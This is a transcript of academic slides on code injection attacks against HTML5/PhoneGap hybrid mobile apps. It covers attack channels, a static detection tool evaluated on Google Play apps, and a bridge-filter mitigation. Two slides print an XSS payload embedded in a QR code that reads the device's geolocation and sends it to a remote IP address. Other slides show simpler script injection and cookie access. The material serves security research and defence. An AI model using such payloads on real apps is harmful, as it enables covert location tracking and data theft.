Architecture of a hybrid app PhoneGap – Open Source Framework. The de-facto standard for hybrid app development; Now in transition into becoming “Apache ...

Jeff发布于2018/06/09 00:00

注脚

1.Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin and Gautam Nagesh Peri

2.Outline Background and motivation Overall problem definition and challenges Related work Solutions for paper 1 Solutions for paper 2 Comparison between the two papers Conclusions

3.Outline Background and motivation Overall problem definition and challenges Related work Solutions for paper 1 Solutions for paper 2 Comparison between the two papers Conclusions

4.(a) (c) (b) (d) (g) (f) (e) (h)

5.Hybrid Apps

6.App Development Comparison

7.Architecture of a hybrid app Native container Creates instance of UIWebView android.webkit.WebView / etc. Navigates to main html file Implements listener/handler for requests coming from JS code Activates JS code when necessary HTML5/CSS3/JS code: Implements UI and app logic Activates native handlers through OS-specific mechanism (custom URL scheme) Receives responses through JS handlers

8.8 HTML5-based Mobile App Hybrid apps

9.Architecture of a hybrid app PhoneGap – Open Source Framework The de-facto standard for hybrid app development Now in transition into becoming “Apache Callback” Provides: A template implementation for the native container Implementation of the JS<->Native bridge for 6 mobile OSs OS-independent JS APIs for activating device functions

10.PhoneGap Architecture

11.HTML5-based Mobile App and Risk

12.12 Overview of HTML5-based Mobile App

13.13 Overview of HTML5-based Mobile App

14.Overview of HTML5-based Mobile App PhoneGap Device Accelerometer Camera Compass Contacts File Geolocation Notification … WebView HTML CSS JavaScript addJavascriptInterface() Advantage: Can be easily ported between different platforms Disadvantage: Need to build the bridge between JavaScript and native resources

15.Overview of PhoneGap Architecture

16.Example: raising a native alert from JS code

17.Example: accessing the camera

18.Example: accessing the camera

19.Risks in HTML5-based Mobile App (JavaScript) Data and code can be mixed together. var text="Hello!<script>alert(hello)</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.

20.Attack Procedures Shortened URLs

21.Attack Procedures SMS / Whatsapps / Facebook Messages / Emails

22.Attack Procedures SMS / Whatsapps / Facebook Messages / Emails Facebook Messenger and in-app browser, clicking the messages executed the XSS payload

23.Attack Procedures Stealing content from Web SQL Database by XSS sample Web SQL was initiated, storing cities information XSS vulnerability was injected in the code from QueryString XSS Payload was inserted in URL to retrieve the first city name from the table “city”

24.Attack Procedures Stealing content from Web SQL Database by XSS The city name of the first record was successfully retrieved by XSS

25.Attack Procedures Eavesdropping Mobile Website Traffic Sample mobile website required user to login, and profile page was displayed after authentication

26.Attack Procedures Eavesdropping Mobile Website Traffic Tcpdump installed in the Android Emulator, it captured all the network traffic from the Emulator

27.Attack Procedures Eavesdropping Mobile Website Traffic The plaintext traffic was viewed by Wireshark, username and password were captured easily

28.Demo Would you scan this?

29.Demo (Video) www.cis.syr.edu/~wedu/android/JSCodeInjection/index.html

30.Demo (Video) www.cis.syr.edu/~wedu/android/JSCodeInjection/index.html

31.Related work Hybrid Apps Security ‘addJavascriptInterface’ vulnerability.

32.Hybrid apps No Bridge Policy No Load Policy

33.Hybrid apps

34.AddJavaScriptInterface Vulnerability Google Android Vulnerability: CVE-2013-4710

35.AddJavaScriptInterface Vulnerability

36.Other Static Analysis in Android Privilege escalation (Permission) Component Hijacking (Intent) SSL/TLS Stowaway Chex SMV-HUNTER Pscout Woodpecker ContentScope MalloDroid ComDroid AppSealer CryptoLint

37.Other Static Analysis in Android Privilege escalation (Permission) Component Hijacking (Intent) SSL/TLS Stowaway Chex SMV-HUNTER Pscout Woodpecker ContentScope MalloDroid ComDroid AppSealer CryptoLint

38.Outline Code Injection Attacks on HTML5-based mobile apps Detection of Code Injection Attacks on HTML5-based mobile apps Mitigation of Code Injection Attacks on HTML5-based mobile apps

39.Code Injection Attacks on HTML5-based Mobile App

40.Cross-Site Scripting Attack (XSS)

41.Overview of our Attack Much broader attack surface

42.Condition1: Attack Channels NFC SMS MP3

43.Condition2: Display APIs(Triggering Code) In our sample set (15,510 apps), 93% of apps use at least one unsafe APIs/attributes at least one time

44.Vulnerable Code Example document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0, onSuccess, onError); } function onSuccess(result) { $("#display").html(result.text); } function onError(contactError) { alert(onError!); } function unrealted() { alert(‘Unrelated functio’); } Condition 1 (channel: barcode) Condition 2 (Vulnerable API:html)

45.Achieving Damage 1 2 3 Directly Attack System Resources Propagate to other Apps Propagate to other Devices

46.Real Vulnerable App Example Malicious QR code Vulnerable App (Android, iOS, Windows Phone) Being Traced

47.Real Vulnerable App Example The malicious code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m=’Latitude:’+loc.coords.latitude+ ’ ’+’Longitude:’+loc.coords.longitude; alert(m); b=document.createElement(’img’); b.src=’http://128.***.213.66:5556?c=’+m })> Use HTML5 Geolocation API to get Location Alert location information for demonstration purpose Real damage, send location information to remote server

48.Detection of Code Injection Attacks on HTML5-based Mobile App

49.Challenges C1: Mixture of application and framework code C2: Difficulties in static analysis on JavaScript C3: Dynamic loaded content <html> <head> <script src= www.example.com/load.js/> </head> <body> <script> document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0,onSuccess, onError); } …… </script> </body> </html> C3 C2 C1

50.Framework Modeling Goal: connect data flow within PhoneGap Framework PhoneGap Framework Model Data Flow Data Flow window = { plugins: { barcodeScanner:{ scan: function scan (mode,suc,err) { exec(suc, err, “scan”,[mode]); }}}} exec:function exec(suc,err,plugin,op,arg){ var dat = “fake”; suc(dat); err(dat); } Windows.plugins.barcodeScanner.scan(0, onSuccess, onError);

51.Evaluation 15,510 apps from the official Google Play Market Hardware spec: Intel Core i7-2600 3.4 GHz with 16 GB RAM. Average processing time : 15.38 sec/app 478/15,510 flagged as vulnerable False positive rate: 2.30% (because of dead code) Performance Accuracy

52.Case Study (The most powerful ones) Selected 20 apps (most powerful ones)

53.Mitigation of Code Injection Attacks on HTML5-based Mobile App

54.Mitigation PhoneGap App PhoneGap Framework (Java) Plugins (Java) Camera Contact SMS Bridge Plugin Manager Filter (jsoup) JSMessage Queue WebView HTML5 CSS JavaScript addJavascript -interface R e s o u r c e s

55.Mitigation PhoneGap App PhoneGap Framework (Java) Plugins (Java) Camera Contact SMS Bridge Plugin Manager Filter (jsoup) JSMessage Queue WebView HTML5 CSS JavaScript addJavascript -interface R e s o u r c e s

56.Mitigation PhoneGap App PhoneGap Framework (Java) Plugins (Java) Camera Contact SMS Bridge Plugin Manager Filter (jsoup) JSMessage Queue WebView HTML5 CSS JavaScript addJavascript -interface R e s o u r c e s

57.XSS Pages that are susceptible to XSS attacks often allow users to add content to the page Simple attack vectors: webblog comments, message board posting, adding to a wiki Add the following content <script type="text/javascript"> alert(vulnerable); </script>

58.XSS <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m=’Latitude:’+loc.coords.latitude+ ’ ’+’Longitude:’+loc.coords.longitude; alert(m); b=document.createElement(’img’); b.src=’http://128.***.213.66:5556?c=’+m })>

59.Same Origin Policy Working with iframes A parent window can get a reference to a frame’s document var x = document.getElementById("myframe"); var y = x.contentDocument ; document.write(y.cookie); How is this safe for something like <iframe src=“http://www.twitter.com”> ?

60.60

61.61

62.61

63.When mobile meets web… Web attacker cannot execute his native code on the user’s device. He can only execute scripts from third-parties, within iframe or in the data. The scripts can be malicious.

64.When mobile meets web… primary paper reference paper Concentration Code injection attacks Origin-based Access Control Vulnerability A number of unique channels can be used by Javascript to inject code Fracking: untrusted web content reach local resources on the device Challenge The developer do not know if there is any js code in their data Hybrid applications do not correctly compose the same origin policy and the access control policy Mitigation Add a filter inside the PhoneGap bridge Add a random token to the PhoneGap bridge to access local resources

65.When mobile meets web… primary paper reference paper Concentration Code injection attacks Origin-based Access Control Vulnerability A number of unique channels can be used by Javascript to inject code Fracking: untrusted web content reach local resources on the device Challenge The developer do not know if there is any js code in their data Hybrid applications do not correctly compose the same origin policy and the access control policy Mitigation Add a filter inside the PhoneGap bridge Add a random token to the PhoneGap bridge to access local resources

66.Conclusion Presented a systematic study of Code Injection Attacks on HTML5-based mobile Apps Designed and implemented a tool to automatic detect the vulnerabilities in HTML5-based mobile App Implemented a prototype (NoInjection) as a patch to the PhoneGap framework in Android to mitigate the attack

67.Conclusion Presented a systematic study of Code Injection Attacks on HTML5-based mobile Apps Designed and implemented a tool to automatic detect the vulnerabilities in HTML5-based mobile App Implemented a prototype (NoInjection) as a patch to the PhoneGap framework in Android to mitigate the attack

user picture
  • Jeff
  • Web Developer and Wiki author from Belgrade

相关Slides